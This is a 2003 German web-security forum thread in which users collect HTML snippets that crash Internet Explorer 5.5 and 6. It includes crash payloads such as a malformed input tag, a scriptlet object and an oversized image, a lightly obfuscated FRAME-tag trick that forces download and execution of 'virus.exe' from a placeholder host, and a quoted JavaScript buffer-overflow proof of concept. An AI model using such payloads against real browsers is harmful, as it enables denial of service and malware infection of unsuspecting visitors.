HTML Code bringt Internet Explorer 6 zum Absturz

Home » Web Security für Webmaster » HTML Code bringt Internet Explorer 6 zum Absturz » Themenansicht

Seite(n): 1 2

Antworten

HTML Code bringt Internet Explorer 6 zum Absturz

03.05.2003, 12:56 Lukas Administrator Beiträge: 1743	#1 Hi, tja was lese ich hier gerade wieder bei Heise: HTML-Code bringt Internet Explorer zum Absturz folgender Code bringt den aktuellen Microsoft Internet Explorer 6 SP1/2 zum abstürzen: Zitat <html> <form> <input type crash> </form> </html> okay wo die schon dabei sind, dachte ich mir erweiter ich die Code Palette mal -> folgender Code bringt den Internet Explorer ebenfalls zum Absturz: Zitat <object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT> </object> und folgender Code ebenfalls (ist in der neusten IE Version gefixt ): Zitat <style>p{csstext: font-weight: bold;}</style> und wer davon nicht genug hat, kann es ja mal mit: http://www.raus.de [Vorsicht! - erst alles abspeichern] versuchen - zieht Dank Popups ganz gerne mal das ganze System runter (nicht nur beim IE) Bugs findet man beim IE eigentlich nicht genug, aber ob Opera und Co da wirklich besser sind? klar um so weniger das Programm bekannt ist um so weniger Leute suchen und finden Bugs... - und bei Microsoft suchen und finden ziemlich viele! vieleicht könnt ihr die BAD HTML Code Liste ja noch ergänzen __________ Gruß Lukas

03.05.2003, 13:46 asdrubael Member Beiträge: 3306	#2 Also das erste funktioniert mit jedem Input Type, aber nur wenn es auf einer extra Seite vorkommt. Der Bug ist eigentlich schon seit langem bekannt. Das zweite funktioniert bei mir auch innerhalb einer bereits vorhandenen Seite. Er lädt zwar erst ein bißchen schmiert dann aber letztendlich doch noch erfolgreich ab Das dritte konnte ich bei mir irgendwie nicht nachvollziehen. Vielleicht haben sie es inzwischen gefixt. Übrigens funktionieren diese Bugs natürlich auch mit Outlook Express, Frontpage und Co. __________ Bitte keine Anfragen per PM, diese werden nicht beantwortet.

03.05.2003, 15:46 TimTaylor Member Beiträge: 76	#3 Der Code ist genial, weil er so genial einfach ist. Hehe! __________ Wer weiß, dass er nichts weiß, weiß mehr als der, der nicht weiß, dass er nichts weiß.

06.05.2003, 21:37 ToRRis Member Beiträge: 44	#4 Hi, natürlich ist der Bug nicht exklusiv dem IE6 vorbehalten, wie es vielleicht das Topic vermuten läßt, sondern betrifft auch alle Vorgängerversionen. "Erfolgreich" getestet habe ich (IE5.5 mit SP2 und zahlreichen Hotfixes etc.): 1. Input-Type-Bug 2. Object-Bug --> Bei deaktivierter ActiveX-Unterstützung passiert nix (aber leider mit)! 3. Style-Bug Auffallend ist, daß alle 3 Bugs in unterschiedlichen DLLs lokalisiert sind: Input-Bug in shlwapi.dll, Object-Bug in shdocvm.dll und der Style-Bug in mshatml.dll. MfG ToRRis

07.05.2003, 08:07 asdrubael Member Beiträge: 3306	#5 Und wenn du das ganze so schreibst: Code <object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet"> VIEWASTEXT </object> Ist es auch noch vollständig W3C-Kompatibel __________ Bitte keine Anfragen per PM, diese werden nicht beantwortet. Dieser Beitrag wurde am 07.05.2003 um 08:07 Uhr von asdrubael editiert.

14.05.2003, 01:17 tucow Member Beiträge: 23	#6 hm gibts nen thread mit den BAD HTML Code's ? wenn ja zeigt mal bitte her find das nicht, hab scho gesucht __________ da sitzt bestimmt immer n typ, der dann auf "disconnect" drückt, wenn 24 h vorbei sind

14.05.2003, 20:23 ToRRis Member Beiträge: 44	#7 Blind? Die HTML-Codes stehen doch weiter oben in diesem Thread... Dieser Beitrag wurde am 14.05.2003 um 20:24 Uhr von ToRRis editiert.

16.05.2003, 18:05 TeleTobi ...neu hier Beiträge: 7	#8 Zitat und wer davon nicht genug hat, kann es ja mal mit: http://www.raus.de [Vorsicht! - erst alles abspeichern] Hm also ich bin immer wieder von Phoenix begeistert Ich bekomme nur ne Seite mit Smiles? und passieren tut nichts gott sei dank Hengt sich eigentlich das ganze System auf? oder was machen diese Bugs? Nur bewirken das der IE sich aufhengt? sers TeleTobi

26.05.2003, 20:48 ToRRis Member Beiträge: 44	#9 Für den 6er IE gibt's jetzt wieder 'ne neue Lücke, diesmal per FRAME-Tag. Man kreiere eine lange Liste mit Frames (ca. 200) ala: Code <FR/\ME src="C:\winnt\notepad.exe"></FR/\ME> ... <FRA/\ME src="h++p://mywebsite.de/virus.exe"></FR/\ME> ... (Anmerkung: Die /\ sind durch A zu ersetzen und die + durch t) Dadurch soll der automatische Download und das Ausführen von virus.exe erzwungen werden. Testseite: h++p://www.malware.com/forceframe.html (VORSICHT!!!) Quelle: http://www.securiteam.com MfG ToRRis Dieser Beitrag wurde am 26.05.2003 um 20:49 Uhr von ToRRis editiert.

10.06.2003, 19:03 lanwareopfer ...neu hier Beiträge: 7	#10 Browser-Verweis auf "c:\" soll auch gut wirken ;-) Zumindest auf 98er Rechnern meines wissens.

11.06.2003, 10:35 asdrubael Member Beiträge: 3306	#11 Code ftp*://???????????????? Bringt meinen IE auch zum Absturz. __________ Bitte keine Anfragen per PM, diese werden nicht beantwortet.

01.07.2003, 18:45 Lukas Administrator Themenstarter Beiträge: 1743	#12 Hab schon wieder was: http://www.tecchannel.de/sicherheit/reports/363.html Zitat Beschreibung Eine Sicherheitslücke in Microsoft Internet Explorer ermöglicht externen Angreifern, das System zu kompromittieren. Die Schwäche beruht auf einem Begrenzungsfehler, über den sich mittels eines HTML-Dokuments mit speziellem Skript-Code ein Pufferüberlauf provozieren lässt. Ein erfolgreicher Angriff bringt entweder den Browser zum Absturz oder ermöglicht die Ausführung beliebigen Codes im Sicherheitskontext des Benutzers. Dazu muss der Angreifer den Benutzer dazu bringen, ein entsprechend präpariertes HTML-Dokument zu betrachten. Das folgende Beispiel stammt aus dem Original-Advisory. Es öffnet ein neues Fenster und fügt dann eine horizontale Linie ein, wobei das Tag <HR> ein überlanges Argument für das Attribut "align" verwendet. Der Inhalt wird anschließend kopiert und das Fenster geschlossen, was den Pufferüberlauf anstößt. <script> wnd=open("about:blank","",""); wnd.moveTo(screen.Width,screen.Height); WndDoc=wnd.document; WndDoc.open(); WndDoc.clear(); buffer=""; for(i=1;i<=127;i++)buffer+="X"; buffer+="DigitalScream"; WndDoc.write("<HR align='"+buffer+"'>"); WndDoc.execCommand("SelectAll"); WndDoc.execCommand("Copy"); wnd.close(); </script> Lösung Schalten Sie das Active Scripting aus. ...echt ein produktives Thread __________ Gruß Lukas

01.09.2003, 14:38 Lukas Administrator Themenstarter Beiträge: 1743	#13 okay IE 6 mit allen Sicherheitspatches bis August: Textpopups sind immer möglich: http://www.computerbytesman.com/security/notepadpopups.htm __________ Gruß Lukas

22.09.2003, 20:53 spunki Member Beiträge: 1516	#14 <img src=neu.jpg width="9000000" height="9000000"> Hab mit den Code schon folgendes geschaft: 1.1-2 Minuten Systemauslastung/stillstand 2. I.E abgeschossen 3. Bluescreen auf Xp weil der Ati Treiber versagt hat Wie sieht es bei euch aus? Ist es bei nividia genau das selbe Problem? Mozilla besteht den Test __________ °<- Vorsicht Trollköder und Trollfalle -> {_}

22.09.2003, 21:40 joschi Moderator Beiträge: 6466	#15 Zitat <img src=neu.jpg width="9000000" height="9000000"> Wie sieht es bei euch aus? Ein IE6, SP1 Q822925 auf nem 66Mhz-Rechner, Win98SE, 64MB RAM, 4MB Grafik, keine Probleme. Langer Scrollbalken, aber prompt angezeigt __________ Durchsuchen --> Aussuchen --> Untersuchen

Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren:

Seite(n): 1 2